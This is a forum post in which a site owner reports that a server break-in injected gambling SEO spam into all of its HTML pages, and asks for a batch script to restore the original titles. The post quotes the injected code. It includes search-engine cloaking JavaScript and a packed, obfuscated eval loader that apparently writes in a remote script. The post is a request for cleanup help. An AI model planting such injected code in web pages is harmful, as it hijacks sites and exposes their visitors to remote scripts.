本帖最后由 echobat 于 2019-12-4 23:27 编辑
服务器被攻击 , 里面网站的html 和htm文件 被写入了一段垃圾代码 ! 如下- <title>671棋牌玩法丰富_多人在线对局_671棋牌登录领彩金</title>
- <meta name="keywords" content="671棋牌玩法丰富,多人在线对局,671棋牌登录领彩金"/>
- <meta name="description" content="671棋牌【671348.com】是一款众多玩家同时在线的热门棋牌类手游,超多的游戏玩法,每天都有不同的各种活动玩法,多人在线对局,671棋牌登录领彩金!游戏还经常保持更新,为玩家带来更多的游戏玩法,这里有着实时语音系统,让你能够认识到来自五湖四海的众多朋友,相互之间切磋牌艺,还有竞技pk玩法,公平公正,展开你高超的棋牌技巧,来打败敌人吧!"/>
- <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="网站首页 - 您的展示中心"}</script>
- <script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\n\\b\\2\\e\\f\\7\\l\\0"]["\\o\\3\\8\\0\\7"](\'\\j\\1\\2\\3\\8\\4\\0 \\0\\k\\4\\7\\d\\6\\0\\7\\p\\0\\5\\h\\c\\t\\c\\1\\2\\3\\8\\4\\0\\6 \\1\\3\\2\\d\\6\\9\\0\\0\\4\\1\\v\\5\\5\\1\\a\\9\\e\\a\\9\\s\\g\\2\\b\\f\\5\\u\\r\\q\\g\\h\\1\\6\\i\\j\\5\\1\\2\\3\\8\\4\\0\\i\');',32,32,'x74|x73|x63|x72|x70|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6d|x2e|x6a|x3e|x3c|x79|x6e|window|x64|x77|x78|x31|x37|x32|x76|x36|x3a'.split('|'),0,{}))
- </script>
复制代码 原来的模样是如下所示 , 想用批处理恢复一下:对方修改了原来的<title>网站首页 - 您的展示中心<title>改成了其他编码形式并加了一段js- <title>网站首页 - 您的展示中心</title>
复制代码 支付宝20元 !
简而言之 :
简而言之 , 批处理正则提取出来并替换掉被污染的title , 效果如下:
document.title ="网站首页 - 您的展示中心"}</script>
↓
<title>网站首页 - 您的展示中心</title>
但是被污染的网页太多 , 且 被污染的网页的title 不一样 , 但是特征是一样的 , 如上所示 , 所以寻求大神写一个批量处理! |